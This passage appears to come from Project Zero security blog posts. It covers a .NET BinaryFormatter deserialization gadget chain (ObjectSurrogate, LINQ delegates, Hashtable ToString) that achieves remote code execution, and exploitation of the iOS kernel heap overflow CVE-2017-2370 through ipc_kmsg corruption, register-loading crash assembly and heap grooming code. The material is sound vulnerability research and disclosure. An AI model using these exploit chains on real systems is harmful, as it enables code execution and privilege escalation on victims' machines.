// Create a simple multicast delegate.
Comparison<string> base_del = new Comparison<string>(String.Compare);
Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(base_del, base_del);
// Create set with original comparer.
IComparer<string> comp = Comparer<string>.Create(d);
SortedSet<string> set = new SortedSet<string>(comp);

// Setup values to call calc.exe with a dummy argument.
set.Add("calc");
set.Add("adummy");

TypeConfuseDelegate(d);

// Test serialization.
BinaryFormatter fmt = new BinaryFormatter();
MemoryStream stm = new MemoryStream();
fmt.Serialize(stm, set);
stm.Position = 0;
fmt.Deserialize(stm);// Calculator should execute during Deserialize.
The only weird thing about this code is TypeConfuseDelegate. It’s a long-standing issue that .NET delegates don’t always enforce their type signature, especially the return value. In this case we create a two-entry multicast delegate (a delegate which will run multiple single delegates sequentially), setting one delegate to String::Compare, which returns an int, and another to Process::Start, which returns an instance of the Process class. This works, even when deserialized, and invokes the two separate methods. It will then return the created process object as an integer, which just means it will return the pointer to the instance of the process object. So we end up with a chain which looks like the following:

While this is a pretty simple chain it has a couple of problems which makes it less than ideal for our use:
  1. The Comparer<T>::Create method and the corresponding class were only introduced in .NET 4.5, which covers Windows 8 and above but not Windows 7.
  2. The exploit relies in part on a type confusion of the return value of the delegate. While it’s only converting the Process object to an integer this is somewhat less than ideal and could have unexpected side effects.
  3. Starting a process is a bit on the noisy side, it would be nicer to load our code from memory.

So we’ll need to find something better. We want something which works at a minimum on .NET 3.5, which is the version Windows Update would automatically update you to on Windows 7. It also shouldn’t rely on undefined behaviour or on loading our code from outside the DCOM channel, such as over an HTTP connection. Sounds like a challenge to me.
Improving the Chain
While looking at some of the other classes which are serializable I noticed a few in the System.Workflow.ComponentModel.Serialization namespace. This namespace contains classes which are part of the Windows Workflow Foundation, a set of libraries to build execution pipelines which perform a series of tasks. This alone sounds interesting, and it turns out I have exploited the core functionality before, as a bypass for Code Integrity in Windows PowerShell.
This led me to the ObjectSerializedRef class. This looks very much like a class which will deserialize any object type, not just serializable ones. If that were the case it would be a very powerful primitive for building a more functional deserialization chain.
[Serializable]
private sealed class ObjectSerializedRef : IObjectReference,
                                           IDeserializationCallback
{
 private Type type;
 private object[] memberDatas;

 [NonSerialized]
 private object returnedObject;

 object IObjectReference.GetRealObject(StreamingContext context) {
   returnedObject = FormatterServices.GetUninitializedObject(type);
   return this.returnedObject;
 }

 void IDeserializationCallback.OnDeserialization(object sender) {
   string[] array = null;
   MemberInfo[] serializableMembers =
      FormatterServicesNoSerializableCheck.GetSerializableMembers(
          type, out array);
   FormatterServices.PopulateObjectMembers(returnedObject,
                          serializableMembers, memberDatas);
 }
}
Looking at the implementation, the class is used as a serialization surrogate exposed through the ActivitySurrogateSelector class. This is a feature of the .NET serialization API: you can specify a “surrogate selector” during the serialization process which will replace an object with a surrogate class. When the stream is deserialized this surrogate class contains enough information to reconstruct the original object. One use case is to handle the serialization of non-serializable classes, but ObjectSerializedRef goes beyond a specific use case and allows you to deserialize anything. A test was in order:
// Definitely non-serializable class.
class NonSerializable {
 private string _text;

 public NonSerializable(string text) {
   _text = text;
 }

 public override string ToString() {
   return _text;
 }
}

// Custom serialization surrogate
class MySurrogateSelector : SurrogateSelector {
 public override ISerializationSurrogate GetSurrogate(Type type,
     StreamingContext context, out ISurrogateSelector selector) {
   selector = this;
   if (!type.IsSerializable) {
     // The internal ObjectSurrogate type needs its assembly-qualified
     // name to resolve:
     Type t = Type.GetType(
         "System.Workflow.ComponentModel.Serialization." +
         "ActivitySurrogateSelector+ObjectSurrogate, " +
         "System.Workflow.ComponentModel, Version=4.0.0.0, " +
         "Culture=neutral, PublicKeyToken=31bf3856ad364e35");
     return (ISerializationSurrogate)Activator.CreateInstance(t);
   }

   return base.GetSurrogate(type, context, out selector);
 }
}

static void TestObjectSerializedRef() {
   BinaryFormatter fmt = new BinaryFormatter();
   MemoryStream stm = new MemoryStream();
   fmt.SurrogateSelector = new MySurrogateSelector();
   fmt.Serialize(stm, new NonSerializable("Hello World!"));
   stm.Position = 0;

   // Should print Hello World!.
   Console.WriteLine(fmt.Deserialize(stm));
}
The ObjectSurrogate class seems to work almost too well. This class totally destroys any hope of securing an untrusted BinaryFormatter stream, and it’s available from .NET 3.0. Any class which doesn’t mark itself as serializable is now a target. It’s going to be pretty easy to find a class which will invoke an arbitrary delegate during deserialization, as developers will not have done anything to guard against such an attack vector.
Now we just need to choose a target to build out our deserialization chain. I could have chosen to poke further at the Workflow classes, but the API is horrible (in fact in .NET 4 Microsoft replaced the old APIs with a new, slightly nicer one). Instead I’ll pick a really easy-to-use target, Language Integrated Query (LINQ).
LINQ was introduced in .NET 3.5 as a core language feature. A new SQL-like syntax was introduced to the C# and VB compilers to perform queries across enumerable objects, such as Lists or Dictionaries. An example of the syntax which filters a list of names based on length and returns the list uppercased is as follows:
string[] names = { "Alice", "Bob", "Carl" };

IEnumerable<string> query = from name in names
                           where name.Length > 3
                           orderby name
                           select name.ToUpper();

foreach (string item in query) {
   Console.WriteLine(item);
}
You can also view LINQ not as a query syntax but instead as a way of doing list comprehension in .NET. If you think of ‘select’ as equivalent to ‘map’ and ‘where’ as ‘filter’ it might make more sense. Underneath the query syntax is a series of methods implemented in the System.Linq.Enumerable class. You can write the query using normal C# syntax instead of the query language; if you do, the previous example becomes the following:
IEnumerable<string> query = names.Where(name => name.Length > 3)
                                .OrderBy(name => name)
                                .Select(name => name.ToUpper());
Methods such as Where take two parameters: a list object (hidden in the above example) and a delegate to invoke for each entry in the enumerable list. The delegate is typically provided by the application, however there’s nothing to stop you replacing the delegates with system methods. The important thing to bear in mind is that the delegates are not invoked until the list is enumerated. This means we can build an enumerable list using LINQ methods, serialize it using the ObjectSurrogate (the LINQ classes are not themselves serializable), and then, if we can force the deserialized list to be enumerated, it will execute arbitrary code.
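Deferred execution is easy to demonstrate in isolation (a toy example, not part of the chain):

string[] names = { "Alice", "Bob", "Carl" };
IEnumerable<string> query = names.Select(name => {
  Console.WriteLine("delegate invoked");
  return name.ToUpper();
});
// Nothing has been printed yet; the delegates only run when the
// list is actually enumerated:
foreach (string name in query) { }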
Using LINQ as a primitive we can create a list which, when enumerated, maps a byte array to an instance of a type contained in that byte array, by the following sequence:
  1. Load the byte array as an Assembly (Assembly::Load).
  2. Extract the list of types from the loaded Assembly (Assembly::GetTypes).
  3. Create an instance of each type (Activator::CreateInstance).
The only tricky part is step 2: we’d like to extract a specific type, but our only real option is the Enumerable.Join method, which requires some weird kludges to get it to work. A better option would have been Enumerable.Zip, but that was only introduced in .NET 4. So instead we’ll just get all the types in the loaded assembly and create them all; if we only have one type then this isn’t going to make any difference. How does the implementation look in C#?
static IEnumerable CreateLinq(byte[] assembly) {
 List<byte[]> base_list = new List<byte[]>();
 base_list.Add(assembly);

 var get_types_del = (Func<Assembly, IEnumerable<Type>>)
                       Delegate.CreateDelegate(
                         typeof(Func<Assembly, IEnumerable<Type>>),
                         typeof(Assembly).GetMethod("GetTypes"));

 return base_list.Select(Assembly.Load)
                 .SelectMany(get_types_del)
                 .Select(Activator.CreateInstance);
}
The only non-obvious part of the C# implementation is the delegate for Assembly::GetTypes. What we need is a delegate which takes an Assembly object and returns a list of Type objects. However, as GetTypes is an instance method, the default would be to capture an Assembly instance and store it inside the delegate object, which would result in a delegate that took no parameters and returned a list of Type. We can get around this by using the reflection APIs to create an open delegate to an instance member. An open delegate doesn’t store the object instance; instead it exposes it as an additional Assembly parameter, exactly what we want.
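As a toy illustration of the difference between a closed and an open delegate (nothing exploit-specific here):

// Closed delegate: the string instance "hello" is captured inside
// the delegate, so it takes no parameters.
Func<string> closed = "hello".ToUpper;

// Open delegate: no instance is captured, the receiver becomes an
// explicit first parameter instead.
Func<string, string> open = (Func<string, string>)Delegate.CreateDelegate(
    typeof(Func<string, string>),
    typeof(string).GetMethod("ToUpper", Type.EmptyTypes));

Console.WriteLine(open("hello")); // prints HELLO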
With our enumerable list we can get the assembly loaded and our own code executed, but how do we get the list enumerated to start the chain? For this I decided to try and find a class which would enumerate the list when calling ToString (a pretty common method). This is easy in Java: almost all the collection classes have this exact behavior. Sadly it seems .NET doesn’t follow Java in this respect. So I modified my analysis tools to hunt for gadgets which would get us there. To cut a long story short I found a chain from ToString to IEnumerable through three separate classes. The chain looks something like the following:
Are we done yet? No, just one more step: we need to call ToString on an arbitrary object during deserialization. Of course I wouldn’t have chosen ToString if I didn’t already have a method to do this. In this final case I’ll go back to abusing poor old Hashtable. During deserialization the Hashtable class rebuilds its key set, which we already know about as this is how I exploited serialization for local EoP. If two keys are equal then the deserialization will fail, with the Hashtable throwing an exception and running the following code:
throw new ArgumentException(
    Environment.GetResourceString("Argument_AddingDuplicate__",
                                  buckets[bucketNumber].key, key));
It’s not immediately obvious why this would be useful. But perhaps looking at the implementation of GetResourceString will make it clearer:
internal static String GetResourceString(String key, params Object[] values) {
   String s = GetResourceString(key);
   return String.Format(CultureInfo.CurrentCulture, s, values);
}
The key is passed to GetResourceString in the values array, along with the name of a resource string. The resource string is looked up and passed, together with the values, to String.Format. The resulting resource string contains formatting codes, so when String.Format encounters the non-string value it calls ToString on the object to format it. This results in ToString being called during deserialization, kicking off the chain of events which leads to us loading an arbitrary .NET assembly from memory and executing code in the context of the WMI client.
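The formatting behaviour is simple to see on its own (illustrative only):

class ToStringCanary {
  public override string ToString() {
    Console.WriteLine("ToString called by String.Format!");
    return "canary";
  }
}

// String.Format calls ToString on any non-string argument it has to
// substitute into the format string:
string s = String.Format("Adding duplicate key: {0}", new ToStringCanary());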
You can see the final implementation in the latest PoC I’ve added to the issue tracker.
Conclusions
Microsoft fixed the RCE issue by ensuring that the System.Management classes never directly create an RCW for a WMI object. However this fix doesn’t affect any other use of DCOM in .NET, so privileged .NET DCOM servers are still vulnerable and other remote DCOM applications could also be attacked.
This should also be a lesson never to deserialize untrusted data using the .NET BinaryFormatter class. It’s a dangerous thing to do at the best of times, but it seems the developers have abandoned any hope of making serializable classes secure. The presence of ObjectSurrogate effectively means that every class in the runtime is serializable, whether the original developer wanted it to be or not.
And as a final thought, you should always be skeptical about the security implementation of middleware, especially if you can’t inspect what it does. The fact that the issue with IManagedObject is designed in and hard to remove makes it very difficult to fix correctly.
Categories: Security

Exception-oriented exploitation on iOS

Tue, 04/18/2017 - 12:06
Posted by Ian Beer, Project Zero
This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing and how to build live kernel introspection features using old kernel exploits.
It’s a trap!
Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:
/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),
/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),
Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel APIs. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.
Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code, complex mach traps often have to do lots of manual argument parsing, which is tricky to get right.
In iOS 10 a new entry appeared in the mach_traps table:
/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),
The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:
  struct mach_voucher_extract_attr_recipe_args {
    PAD_ARG_(mach_port_name_t, voucher_name);
    PAD_ARG_(mach_voucher_attr_key_t, key);
    PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);
    PAD_ARG_(user_addr_t, recipe_size);
  };
A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.
Let’s walk through the trap code:
kern_return_t
mach_voucher_extract_attr_recipe_trap(
  struct mach_voucher_extract_attr_recipe_args *args)
{
  ipc_voucher_t voucher = IV_NULL;
  kern_return_t kr = KERN_SUCCESS;
  mach_msg_type_number_t sz = 0;
  if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))
    return KERN_MEMORY_ERROR;
copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.
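For reference, copyin has roughly the following prototype in XNU (simplified here from the kernel headers):

// Copies nbytes from the userspace address uaddr to the kernel
// address kaddr; returns non-zero on failure.
int copyin(const user_addr_t uaddr, void *kaddr, size_t nbytes);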
  if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE)
    return MIG_ARRAY_TOO_LARGE;
mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.
  voucher = convert_port_name_to_voucher(args->voucher_name);
  if (voucher == IV_NULL)
    return MACH_SEND_INVALID_DEST;
convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.
  if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {
    /* keep small recipes on the stack for speed */
    uint8_t krecipe[sz];
    if (copyin(args->recipe, (void *)krecipe, sz)) {
      kr = KERN_MEMORY_ERROR;
      goto done;
    }
    kr = mach_voucher_extract_attr_recipe(voucher,
             args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);

    if (kr == KERN_SUCCESS && sz > 0)
      kr = copyout(krecipe, (void *)args->recipe, sz);
  }
If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:
  else {
    uint8_t *krecipe = kalloc((vm_size_t)sz);
    if (!krecipe) {
      kr = KERN_RESOURCE_SHORTAGE;
      goto done;
    }

    if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
      kfree(krecipe, (vm_size_t)sz);
      kr = KERN_MEMORY_ERROR;
      goto done;
    }
The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.
If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!
To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.
a recipe for copypasta
Right above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.
These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.
It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.
This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)
Here’s the relevant code from the two functions, the first snippet is fine and the second has the bug:
host_create_mach_voucher_trap:
 if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
   kfree(krecipes, (vm_size_t)args->recipes_size);
   kr = KERN_MEMORY_ERROR;
   goto done;
 }
mach_voucher_extract_attr_recipe_trap:
  if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
    kfree(krecipe, (vm_size_t)sz);
    kr = KERN_MEMORY_ERROR;
    goto done;
  }
My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:
error: no member named 'recipes_size' in 'struct mach_voucher_extract_attr_recipe_args'; did you mean 'recipe_size'?
if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
                                                  ^~~~~~~~~~~~
                                                  recipe_size
Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.
Building primitives
copyin on iOS will fail if the size argument is greater than 0x4000000. Since args->recipe_size also needs to be a valid userspace pointer, this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it: copyin will fault when the copy reaches the unmapped source page and stop.

If the copyin fails the kalloced buffer will be immediately freed.
Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.
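A hedged sketch of that userspace setup (the low address, page size and helper below are illustrative, not the real PoC, and assume the binary was linked with a small enough pagezero_size for the low mapping to succeed):

#include <sys/mman.h>
#include <stdint.h>
#include <string.h>

#define PAGE_SZ 0x4000  // 16k pages on arm64

// Returns the recipe and recipe_size pointers to pass to the trap.
void setup_overflow(uint8_t** recipe_out, uint32_t** size_ptr_out,
                    size_t overflow_len) {
  // The numeric value of this low pointer doubles as the copyin
  // length, so it must be below 0x4000000:
  uint32_t* size_ptr = mmap((void*)0x4000, PAGE_SZ, PROT_READ | PROT_WRITE,
                            MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
  *size_ptr = 0x1000;  // sz: the kalloc allocation size

  // Align the controlled bytes flush against an unmapped page so
  // copyin writes exactly overflow_len bytes past the kalloc buffer
  // before it faults:
  uint8_t* pages = mmap(NULL, 2 * PAGE_SZ, PROT_READ | PROT_WRITE,
                        MAP_ANON | MAP_PRIVATE, -1, 0);
  munmap(pages + PAGE_SZ, PAGE_SZ);
  uint8_t* recipe = pages + PAGE_SZ - (0x1000 + overflow_len);
  memset(recipe, 'A', 0x1000 + overflow_len);  // controlled data

  *recipe_out = recipe;
  *size_ptr_out = size_ptr;
}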
When I’m working on a new exploit I spend a lot of time looking for new primitives: for example, objects allocated on the heap which, if I could overflow into them, would cause a chain of interesting things to happen. Generally “interesting” means that corrupting the object lets me build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.
To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.
For anyone who has ever written a browser exploit this will be a familiar construct!
ipc_kmsg
Reading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:
struct ipc_kmsg {
  mach_msg_size_t            ikm_size;
  struct ipc_kmsg            *ikm_next;
  struct ipc_kmsg            *ikm_prev;
  mach_msg_header_t          *ikm_header;
  ipc_port_t                 ikm_prealloc;
  ipc_port_t                 ikm_voucher;
  mach_msg_priority_t        ikm_qos;
  mach_msg_priority_t        ikm_qos_override;
  struct ipc_importance_elem *ikm_importance;
  queue_chain_t              ikm_inheritance;
};
This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?
Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:
void ipc_kmsg_free(ipc_kmsg_t kmsg);
This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.
This macro is used to set the ikm_size field:
#define ikm_init(kmsg, size)  \
MACRO_BEGIN                   \
 (kmsg)->ikm_size = (size);   \
This macro uses the ikm_size field to set the ikm_header pointer:
#define ikm_set_header(kmsg, mtsize)                        \
MACRO_BEGIN                                                 \
 (kmsg)->ikm_header = (mach_msg_header_t *)                 \
 ((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \
MACRO_END
That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.
Finally there’s a check in ipc_kmsg_get_from_kernel:
  if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
    ip_unlock(dest_port);
    return MACH_SEND_TOO_LARGE;
  }
That’s using the ikm_size field to ensure that there’s enough space in the ikm_kmsg buffer for a message.
It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into... another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.
It’s about sending a message
ipc_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ipc_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.
Larger messages bypass this cache and are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer the structure is immediately initialized using the two macros we saw:
  kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));
...
  if (kmsg != IKM_NULL) {
    ikm_init(kmsg, max_expanded_size);
    ikm_set_header(kmsg, msg_and_trailer_size);
  }
 return(kmsg);
Unless we’re able to corrupt the ikm_size field in between those two macros the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.
But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.
This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG apis for example. The function’s comment explains more:
 * Routine: ipc_kmsg_get_from_kernel
 * Purpose:
 * First checks for a preallocated message
 * reserved for kernel clients.  If not found -
 * allocates a new kernel message buffer.
 * Copies a kernel message to the message buffer.
Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ipc_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers and whether it’s currently in use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):
  if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {
    mach_msg_size_t max_desc = 0;

    kmsg = dest_port->ip_premsg;
    if (ikm_prealloc_inuse(kmsg)) {
      ip_unlock(dest_port);
      return MACH_SEND_NO_BUFFER;
    }

    if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
      ip_unlock(dest_port);
      return MACH_SEND_TOO_LARGE;
    }
    ikm_prealloc_set_inuse(kmsg, dest_port);
    ikm_set_header(kmsg, msg_and_trailer_size);
    ip_unlock(dest_port);
...
    (void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);
This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro, which sets ikm_header such that the message will align to the end of the buffer, and finally calls memcpy to copy the message into the ipc_kmsg.

This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is, then when the kernel sends a message it will write the message contents off the end of the preallocated message buffer.
ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.
This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.
Exceptional behaviour
There’s one difficulty with preallocated messages: because they’re only used when the kernel sends a message to us, we can’t just send a message with controlled data and have it use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control, which is much harder!
There are only a handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually contain only a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.
When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.
If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port, and if that also fails the exception message will be delivered to the global host exception port. A thread can normally set its own exception port, but setting the host exception port is a privileged action.
routine thread_set_exception_ports(
         thread         : thread_act_t;
         exception_mask : exception_mask_t;
         new_port       : mach_port_t;
         behavior       : exception_behavior_t;
         new_flavor     : thread_state_flavor_t);
This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behaviour defines what type of exception message we want to receive and new_flavor lets us specify what kind of process state we want to be included in the message.
Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purposes registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!
Some assembly required...
In our iOS Xcode project we can add a new assembly file and define a function load_regs_and_crash:
.text
.globl  _load_regs_and_crash
.align  2
_load_regs_and_crash:
mov x30, x0
ldp x0, x1, [x30, 0]
ldp x2, x3, [x30, 0x10]
ldp x4, x5, [x30, 0x20]
ldp x6, x7, [x30, 0x30]
ldp x8, x9, [x30, 0x40]
ldp x10, x11, [x30, 0x50]
ldp x12, x13, [x30, 0x60]
ldp x14, x15, [x30, 0x70]
ldp x16, x17, [x30, 0x80]
ldp x18, x19, [x30, 0x90]
ldp x20, x21, [x30, 0xa0]
ldp x22, x23, [x30, 0xb0]
ldp x24, x25, [x30, 0xc0]
ldp x26, x27, [x30, 0xd0]
ldp x28, x29, [x30, 0xe0]
brk 0
.align  3
This function takes a pointer to a 240-byte buffer as its first argument and loads each of the first 30 ARM64 general-purpose registers with values from that buffer, so that when it triggers a software interrupt via brk 0 and the kernel sends an exception message, that message contains the bytes from the input buffer in the same order.
We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite the ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However iOS only runs on very locked-down hardware with no supported way to do kernel debugging.
I’m going to build my own kernel debugger (with printfs and hexdumps)
A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work, but we can still build a meaningful kernel debugging environment using just kernel memory access.
There’s a bootstrapping problem here: we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access! In December I published the mach_portal iOS kernel exploit, which gives you kernel memory read/write, and as part of that I wrote a handful of kernel introspection functions which allow you to find process task structures and look up mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.
The first version of this new exploit was developed inside the mach_portal Xcode project so I could reuse all the code. After everything was working I ported it from iOS 10.1.1 to iOS 10.2.
Inside mach_portal I was able to find the address of a preallocated port buffer like this:
  // allocate an ipc_kmsg:
  kern_return_t err;
  mach_port_qos_t qos = {0};
  qos.prealloc = 1;
  qos.len = size;

  mach_port_name_t name = MACH_PORT_NULL;

  err = mach_port_allocate_full(mach_task_self(),
                                MACH_PORT_RIGHT_RECEIVE,
                                MACH_PORT_NULL,
                                &qos,
                                &name);

  uint64_t port = get_port(name);
  uint64_t prealloc_buf = rk64(port + 0x88);
  printf("0x%016llx,\n", prealloc_buf);
get_port was part of the mach_portal exploit and is defined like this:
uint64_t get_port(mach_port_name_t port_name) {
  return proc_port_name_to_port_ptr(our_proc, port_name);
}

uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {
  uint64_t ports = get_proc_ipc_table(proc);
  uint32_t port_index = port_name >> 8;
  uint64_t port = rk64(ports + (0x18 * port_index)); // ie_object
  return port;
}

uint64_t get_proc_ipc_table(uint64_t proc) {
  uint64_t task_t = rk64(proc + struct_proc_task_offset);
  uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);
  uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);
  return is_table;
}
These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.
I used this method with some trial and error to determine the correct value to overwrite ikm_size with in order to align the controlled portion of an exception message with the start of the next heap object.
get-where-what
The final piece of the puzzle is the ability to know where controlled data is; rather than write-what-where we want to get where what is.
One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.
One aspect I haven’t touched on up until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap for the last few years in a series of conference talks, the latest talk has details of the zone freelist randomization.
Whilst experimenting with the heap behaviour using the introspection techniques described above, I noticed that some size classes would actually still give you close to linear allocation behavior (later allocations are contiguous). It turns out this is due to the lower-level allocator which zalloc gets pages from: by exhausting a particular zone we can force zalloc to fetch new pages, and if our allocation size is close to the page size we’ll just get that page back immediately.
This means we can use code like this:
  int prealloc_size = 0x900; // kalloc.4096

  for (int i = 0; i < 2000; i++) {
    prealloc_port(prealloc_size);
  }

  // these will be contiguous now, convenient!
  mach_port_t holder = prealloc_port(prealloc_size);
  mach_port_t first_port = prealloc_port(prealloc_size);
  mach_port_t second_port = prealloc_port(prealloc_size);

to get a heap layout like this:

This is not completely reliable; on devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique, but it works well enough for a research tool.
